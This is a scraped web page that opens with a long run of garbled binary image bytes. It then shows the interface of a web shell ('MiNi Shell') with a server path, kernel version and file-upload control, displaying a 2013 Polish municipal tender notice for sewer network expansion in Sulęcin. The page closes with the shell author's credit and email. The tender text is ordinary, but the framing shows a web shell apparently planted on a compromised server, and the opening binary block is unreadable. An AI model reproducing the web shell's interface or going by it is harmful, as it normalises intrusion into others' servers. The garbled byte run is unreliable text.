JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130821/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130821/336410-N-2013.html

<p class="kh_header"><b>Sulęcin: Rozbudowa systemu kanalizacji sanitarnej w gminie Sulęcin - Etap Trzemeszno Lubuskie.</b><br>
<b>Numer ogłoszenia: 336410 - 2013; data zamieszczenia: 21.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Sulęcinie , ul. Lipowa 18, 69-200 Sulęcin, woj. lubuskie, tel. 095 7553601, faks 095 7552122.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.sulecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa systemu kanalizacji sanitarnej w gminie Sulęcin - Etap Trzemeszno Lubuskie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiotem zamówienia jest rozbudowa systemu kanalizacji sanitarnej w gminie Sulęcin- etap Trzemeszno Lubuskie w tym m. in.: 

I.  Kanalizacja sanitarna grawitacyjno - tłoczna w m. Trzemeszno cz. I

1.	Sieć kanalizacji grawitacyjnej

-	Rurociąg z rur PVC-U SN 8 dn 200 mm  o długości 4 001,66 m
-	Rurociąg z rur PVC-U SN 8 dn 160 mm   o długości 78,24 m
-	Studnie rewizyjne dn 1200 mm z elementów betonowych B45 z prefabrykowaną kinetą, włazem żeliwnym typu ciężkiego z wypełnieniem betonowym -  2,00 kpl
-	Studnie rewizyjne dn 1000 mm z monolityczne z tworzyw sztucznych z włazem żeliwnym typu ciężkiego - 173,00 kpl
-	Studzienki kanalizacyjne systemowe śr. 425mm z tworzyw sztucznych 37,00 kpl
-	Rozbiórka i odtworzenie nawierzchni z brukowca tj. warstwa odsączająca z piasku gr 10 cm + podbudowa z kruszywa łamanego naturalnego o frakcji 0/31,5 mm, stablizowanego mechanicznie, gr. 20 cm + warstwa odcinająca z piasku gr. 10cm + brukowiec - 282,00 m2
-	Odtworzenie nawierzchni gruntowej tj. warstwa odsączająca z piasku gr 20 cm + nawierzchnia z kruszywa łamanego naturalnego o frakcji 0/31,5 mm, stablizowanego mechanicznie, gr. 15 cm  - 790,00 m2
-	Rozbiórka i odtworzenie nawierzchni z betonu asfaltowego tj. podbudowa z kruszywa łamanego naturalnego o frakcji 0/31,5mm, stabilizowanego mechanicznie gr. 20 cm + podbudowa zasadnicza z betonu asfaltowego o uziarnieniu 0/16 mm, grubości 14 cm + warstwa wiążąca z betonu o uziarnieniu 0/12,8 mm, grubości 8 cm + warstwa ścieralna z mas SMA o uziarnieniu 0/12,8 mm, grubości 5 cm - 600,00 m2

2. Odgałęzienia sieci grawitacyjnej do granicy działek
-	Odgałęzienia sieci - rurociąg z rur PVC-U SN 8 dn 200 mm o długości 6,50 m
-	Odgałęzienia sieci - rurociąg z rur PVC-U SN 8 dn 160 mm o długości 397,66 m



3. Sieć kanalizacji sanitarnej tłocznej wraz z tłocznią ścieków PS1
-	Rurociąg tłoczny z rur polietylenowych śr. 110mm o długości 57,74 m
-	Montaż biofiltrów w studniach rozprężnych - 1,00 kpl
-	Tłocznia ścieków PS1 prefabrykowana, kompletna,  o parametrach i wyposażeniu wg PT wraz z zagospodarowaniem terenu i zasilaniem energetycznym - 1,00 kpl

4. Sieć kanalizacji sanitarnej tłocznej wraz z tłocznią ścieków PS2
-	Rurociąg tłoczny z rur polietylenowych śr. 110mm o długości 79,51 m
-	Tłocznia ścieków PS2 prefabrykowana, kompletna,  o parametrach i wyposażeniu wg PT wraz z zagospodarowaniem terenu i zasilaniem energetycznym - 1,00 kpl
-	Rozbiórka i odtworzenie nawierzchni z kostki betonowej tj. podsypka piaskowo-cementowa gr 5cm + kostka betonowa typu polbruk gr. 8 cm - 54,00 m2

5. Sieć kanalizacji sanitarnej tłocznej wraz z tłocznią ścieków PS3

-	Rurociąg tłoczny z rur polietylenowych śr. 63mm o długości 221,50 m
-	Montaż biofiltrów w studniach rozprężnych - 1,00 kpl
-	Tłocznia ścieków PS3 prefabrykowana, kompletna,  o parametrach i wyposażeniu wg PT wraz z zagospodarowaniem terenu i zasilaniem energetycznym - 1,00 kpl



II. Kanalizacja sanitarna grawitacyjno - tłoczna w m. Trzemeszno cz. II

1. Sieć kanalizacji grawitacyjnej

-	Rurociąg z rur PVC-U SN 8 dn 200 mm o długości 2 601,41 m
-	Studnie rewizyjne dn 1200 mm z elementów betonowych B45 z prefabrykowaną kinetą, włazem żeliwnym typu ciężkiego z wypełnieniem betonowym - 1,00 kpl
-	Studnie rewizyjne dn 1000 mm z monolityczne z tworzyw sztucznych z włazem żeliwnym typu ciężkiego - 90,00 kpl
-	Rozbiórka i odtworzenie nawierzchni z brukowca tj. warstwa odsączająca z piasku gr 10 cm + podbudowa z kruszywa łamanego naturalnego o frakcji 0/31,5 mm, stablizowanego mechanicznie, gr. 20 cm + warstwa odcinająca z piasku gr. 10cm + brukowiec - 448,88 m2
-	Odtworzenie nawierzchni gruntowej tj. warstwa odsączająca z piasku gr 20 cm + nawierzchnia z kruszywa łamanego naturalnego o frakcji 0/31,5 mm, stablizowanego mechanicznie, gr. 15 cm  1 105,00 m2

2. Odgałęzienia sieci grawitacyjnej do granicy działek

-	Odgałęzienia sieci - rurociąg z rur PVC-U SN 8 dn 200 mm o długości 9,00 m
-	Odgałęzienia sieci - rurociąg z rur PVC-U SN 8 dn 160 mm o długości 56,50 m

3. Sieć kanalizacji sanitarnej tłocznej wraz z tłocznią ścieków PS4

-	Rurociąg tłoczny z rur polietylenowych śr. 110mm  o długości 730,50 m
-	Studnia czyszczakowa dn 1200 mm z elementów betonowych B45 z prefabrykowaną kinetą, włazem żeliwnym typu ciężkiego z wypełnieniem betonowym z wyposażeniem i armaturą - 3,00 kpl
-	Zawór napowietrzająco - odpowietrzający dn 80 mm do zabudowy podziemnej - 2,00 kpl
-	Montaż biofiltrów w studniach rozprężnych - 12,00 kpl
-	Tłocznia ścieków PS4 prefabrykowana, kompletna,  o parametrach i wyposażeniu wg PT wraz z zagospodarowaniem terenu i zasilaniem energetycznym - 1,00 kpl
-	Rozbiórka i odtworzenie nawierzchni z kostki betonowej tj. podsypka piaskowo-cementowa gr 5cm + kostka betonowa typu polbruk gr. 8 cm - 224,00 m2




III. Przesył Trzemeszno - Grochowo

1. Sieć kanalizacji grawitacyjnej

-	Rurociąg z rur PVC-U SN 8 dn 200 mm o długości 576,50 m
-	Studnie rewizyjne dn 1000 mm z monolityczne z tworzyw sztucznych z włazem żeliwnym typu ciężkiego - 20,00 kpl
-	Odgałęzienia sieci - rurociąg z rur PVC-U SN 8 dn 160 mm o długości 19,50 m


IV. Budowa kanalizacji sanitarnej tłocznej na trasie Trzemeszno - Wędrzyn

1. Roboty przygotowawcze i ziemne

-	Roboty przygotowawcze i ziemne - 1,00 kpl

2. Roboty montażowe
-	Rurociąg z rur PVC-U SN 8 dn 200 mm o długości 24,90 m
-	Studnie rewizyjne dn 1200 mm z elementów betonowych B45 z prefabrykowaną kinetą, włazem żeliwnym typu ciężkiego z wypełnieniem betonowym - 2,00 kpl
-	Rurociąg tłoczny z rur polietylenowych śr. 110mm  o długości 2 496,00 m
-	Studnia czyszczakowa dn 1200 mm z elementów betonowych B45 z prefabrykowaną kinetą, włazem żeliwnym typu ciężkiego z wypełnieniem betonowym z wyposażeniem i armaturą - 14,00 kpl
-	Zawór napowietrzająco - odpowietrzający dn 80 mm do zabudowy podziemnej - 3,00 kpl
-	Montaż biofiltrów w studniach rozprężnych -  3,00 kpl
-	Tłocznia ścieków PG prefabrykowana, kompletna,  o parametrach i wyposażeniu wg PT - 1,00 kpl


3. Zagospodarowanie terenu tłoczni ścieków
-	Zagospodarowanie terenu tłoczni ścieków - 1,00 kpl


4. Zasilanie tłoczni ścieków w energię elektryczną
-	Zasilanie tłoczni ścieków w energię elektryczną - 1,00 kpl
V.  Materiały promujące projekt 
- wykonanie i montaż 4 szt. tablic reklamowych o wymiarach 150 cm x 100 cm zgodnych z księgą wizualizacji znaku Programu Rozwoju Obszarów Wiejskich na lata 2007- 2013.
- wykonanie audycji telewizyjnej promującej realizację inwestycji, (czas trwania 10 min., 2 emisje na antenie telewizji o zasięgu regionalnym).

 ( ta część przedmiotu zamówienia nie jest objęta współfinansowaniem PROW )
VI. Uzyskanie pozwolenia na użytkowanie wybudowanego obiektu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.10.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wymagane wadium 50.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą,że posiadają wiedzę i doświadczenie w realizacji  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej: 2 roboty budowlane obejmujące budowę sieci kanalizacji sanitarnej grawitacyjnej i tłocznej wraz z przepompowniami ścieków o wartości minimum 5.000.000,00 zł brutto każda, z załączeniem referencji lub innych dokumentów , że roboty te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykażą, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia budowlane i doświadczenie zawodowe:
Kierownik budowy, min 5 letnie doświadczenie zawodowe w kierowaniu robotami, uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń  kanalizacyjnych .
Kierownik robót budowlanych, min. 3 letnie doświadczenie zawodowe w kierowaniu robotami, uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno- budowlanej.
Kierownik robót  drogowych, min. min. 3 letnie doświadczenie zawodowe w kierowaniu robotami, uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej. 
Kierownik robót elektrycznych, min. 3 letnie doświadczenie zawodowe w kierowaniu robotami, uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej, w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 

Ponadto wymagane jest załączenie uprawnień oraz aktualnego zaświadczenia o wpisie w/w osób na listę członków właściwej izby samorządu zawodowego ( mogą być kserokopie potwierdzone za zgodność z oryginałem przez wykonawcę).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę:

Informacji banku lub spółdzielczej kasy oszczędnościowo- kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy minimum 1.500.000,00 PLN, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony formularz oferty wg załącznika nr 1 do SIWZ;
2)	oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia, której wykonanie powierzy podwykonawcom wg załącznika nr 2 do SIWZ;
3)	wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 4 ustawy pzp wg załącznika nr 3 do SIWZ;
4)	wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem  ich rodzaju, wartości, dat wykonania i zamawiających wg załącznika nr 5 do SIWZ, z załączeniem referencji lub innych dokumentów ( mogą być kopie potwierdzone za zgodność z oryginałem przez wykonawcę), że roboty te zostały wykonane należycie.

5) Informacja banku lub spółdzielczej kasy oszczędnościowo- kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy minimum 1.500.000,00 PLN, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

6)	pisemne zobowiązanie w oryginale, o którym mowa w pkt 5.2. SIWZ, o ile Wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp;
7)	pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik Wykonawcy.
8)	Dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Przewiduje się możliwość zmiany sposobu wykonania przedmiotu zamówienia w przypadku:
1)	konieczności wykonania robót zamiennych w stosunku do przewidzianych dokumentacją projektową,  w sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego, zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami wykonania przedmiotu umowy,
2)	wprowadzenia zmiany materiałów i urządzeń w stosunku do przewidzianych dokumentacją projektową pod warunkiem, ze zmiany te będą korzystne dla Zamawiającego. Zmiany te mogą dotyczyć następujących okoliczności:
a)	poprawienie parametrów technicznych,
b)	wynikające z aktualizacji rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów,
c)	powodujące obniżenie kosztu ponoszonego przez Zamawiającego na eksploatację i konserwacje  wykonanego przedmiotu zamówienia,

3)	zmniejszenia przedmiotu zamówienia, pod warunkiem, że z niemożliwych do przewidzenia na etapie planowania inwestycji przyczyn wykonanie całości przedmiotu zamówienia napotyka istotne trudności, których przezwyciężenie wymagałoby poniesienia niewspółmiernie wysokich kosztów.
2.	Przewiduje się warunki zmiany umówionego terminu wykonania zamówienia:
1)	jeżeli zajdzie konieczność wykonania robót dodatkowych równolegle z zamówieniem podstawowym,
2)	z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa, 
3)	z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
4)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
5)	z powodu ujawnienia odkryć archeologicznych wymagających przeprowadzenia badań 
            ratowniczych 
6)	z powodu ujawnienia niewybuchów i niewypałów wymagających wstrzymania robót i  
        dokonania ich usunięcia przez specjalistyczne służby</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sulecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Sulęcinie, ul. Lipowa 18, 69-200 Sulęcin, pok. nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.09.2013 godzina 11:00, miejsce: Urząd Miejski w Sulęcinie, ul. Lipowa 18, 69-200 Sulęcin, pok. nr 36 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rolnego
na rzecz Rozwoju Obszarów Wiejskich w ramach działania Podstawowe Usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007- 2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com